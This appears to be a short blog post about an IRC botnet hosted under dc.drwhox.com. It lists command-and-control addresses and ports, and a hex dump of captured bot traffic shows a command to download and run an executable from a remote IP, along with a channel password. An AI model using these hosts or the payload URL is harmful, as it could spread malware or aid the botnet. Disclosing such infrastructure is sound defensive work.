dc.drwhox.com(botnet hosted in China Beijing Chinanet Hebei Province Network)

Remote Host Port Number
112.78.112.208 80
218.85.133.201 80
61.136.59.34 80
123.183.217.32 5943
123.183.217.32 6943
27.54.225.102 6943

PRIVMSG #dc1 :Err0r..
MODE [N00_USA_XP_7890652]
@ -ix

00000030 | 5F36 3033 3038 3139 5D18 E740 0D0A 7365 | _6030819]..@..se
00000040 | 6E64 2023 6A2C 234D 6120 6F6F 6F6F 0D0A | nd #j,#Ma oooo..
00000050 | 5052 5256 4D53 4720 2369 203A 4854 5450 | PRRVMSG #i :HTTP
00000060 | 2053 4554 2068 7474 703A 2F2F 3631 2E31 | SET http://61.1
00000070 | 3336 2E35 392E 3334 2F4C 5743 2F64 6330 | 36.59.34/LWC/dc0
00000080 | 2E65 7865 0D0A 5052 5256 4D53 4720 5B4E | .exe..PRRVMSG [N
00000090 | 3030 5F55 5341 5F58 505F 3630 3330 BCB9 | 00_USA_XP_6030..
000000A0 | 4020 3A20 5472 7969 6E67 2074 6F20 6765 | @ : Trying to ge
000000B0 | 7420 6578 7465 726E 616C 2049 502E 0D0A | t external IP…
000000C0 | 5041 5353 206C 616F 726F 7372 0D0A 4B43 | PASS laorosr..KC
000000D0 | 494B 205B 4E30 305F 5553 415F 5850 5F37 | IK [N00_USA_XP_7
000000E0 | 3839 3036 3532 5D18 E740 0D0A | 890652]..@..

infos about hosting:
http://whois.domaintools.com/123.183.217.32

Categories: Uncategorized